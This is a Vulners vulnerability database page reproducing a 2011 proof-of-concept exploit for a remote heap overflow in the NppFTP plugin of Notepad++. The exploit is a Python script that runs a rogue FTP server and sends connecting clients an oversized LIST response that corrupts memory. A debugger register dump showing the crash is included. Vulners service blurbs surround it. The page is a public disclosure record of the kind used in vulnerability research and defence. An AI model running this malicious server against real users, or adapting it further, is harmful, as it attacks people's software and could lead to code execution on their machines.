Vulners
Lucene search
Notepad++ NppFTP Heap Overflow
`# Notepad++ NppFTP plugin LIST command Remote Heap Overflow PoC
# Date: 17.08.2011
# Author: 0in (Maksymilian Motyl)
# Mail: 0in [dot] email /at\ gmail \dot/ com
# Software Link: http://notepad-plus-plus.org/
# Vulnerable plugin: http://sourceforge.net/projects/nppftp/
# Version: Tested on nppftp 0.2.3.0 and 0.2.4.0 (newest)
# Debug:
# EAX 42414141
# ECX 00000ED6
# EDX 024FD99C ASCII "AAABAAABAAABAAABAAABAAABAAABAAABAAABAAABAAABAAABAAABAAABAAABAAABAAABAAABAAA"
# EBX 42414141
# ESP 000E0F48
# EBP 000E0F70
# ESI 024FD100
# EDI 024FD100
# EIP 6A14D2D7 NppFTP.6A14D2D7
# 6A14D2D7 8B03 MOV EAX,DWORD PTR DS:[EBX]
# 6A14D2D9 891C24 MOV DWORD PTR SS:[ESP],EBX
# 6A14D2DC FF50 2C CALL DWORD PTR DS:[EAX+2C] <- BOOM
# Theoretically its exploitable, but we haven't much available memory to work with, and
# all memory is dynamicly located, so all addresses are not static..
import socket
import os
class ftp_server:
def __init__(self):
self.host = '0.0.0.0'
self.passive_port = 2531
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.bind(('', 21))
self.sock.listen(1)
a = self.passive_port/256
b = self.passive_port%256
self.tuple_port = (a, b)
self.host_join = ','.join(self.host.split('.'))
self.passive = False
def get(self):
return self.conn.recv(1024).replace('\r', '').replace('\n', '')
def getcwd(self):
# return shellcode
return "passwords"
def put(self, ftr):
x = {
150:" Data connection accepted from %s:%s; transfer starting."%(self.host, self.passive_port),
200:" Type okay.",
220:" Server ready.",
226:" Listing completed.",
227:" Entering Passive Mode (%s,%s,%s)"%(self.addr_join, self.tuple_port[0], self.tuple_port[1]),
230:" User logged in, proceed.",
250:' "/%s" is new cwd.'%self.getcwd(),
257:' "/%s" is cwd.'%self.getcwd(),
331:" User name okay, need password.",
502:" Command not implemented.",
551:" Requested action aborted. Page type unknown."
}[ftr]
s = '%s%s\r\n'%(ftr, x)
self.conn.send(s)
return s
def main(self):
self.conn, self.addr = self.sock.accept ()
self.addr_join = ','.join(self.addr[0].split('.'))
self.put(220)
while 1:
try:
data = self.get().upper()
except socket.error:
self.conn.close()
self.sock.shutdown(socket.SHUT_RDWR)
if self.passive:
self.conn2.close()
self.sock2.shutdown(socket.SHUT_RDWR)
raise socket.error
if data[:4] == 'USER': s = 331
elif data[:4] == 'PASS': s = 230
elif data[:3] == 'PWD': s = 257
elif data[:4] == 'TYPE':
s = 200
elif data[:4] == 'PASV':
self.sock2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock2.bind((self.addr[0], self.passive_port))
self.sock2.listen(1)
s = self.put(227)
self.conn2, addr = self.sock2.accept()
self.passive = True
s = 0
elif data[:3] == 'CWD':
try:
s = 250
except OSError:
s = 551
elif data[:4] == 'LIST':
print "LIST..."
s = self.put(150)
s = self.passive_do(1)
s = self.put(226)
s = 0
else:
s = 502
if s:
s = self.put(s)
def passive_do(self, id):
print "Sending exploit.."
exploit="\x42\x41\x41\x41"*22+"\x42\x41\x41\x41"*53+"C"*400+"D"*4000+"E"*1019+"F"*2000
res = "drwxrwxrwx 5 ftpuser ftpuser 512 Jul 26 "+exploit+" "+"\x95"*18555+"\r\n"
self.conn2.send(res)
self.conn2.send('\r\n')
self.conn2.close()
return res
print "Notepad++ NppFTP plugin LIST command Remote Heap Overflow PoC by 0in"
while 1:
try:
print "Waiting for target.."
ftp_server().main()
except socket.error:
print "Rebooting server...\n"
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
18 Aug 2011 00:00Current
0.4Low risk
Vulners AI Score0.4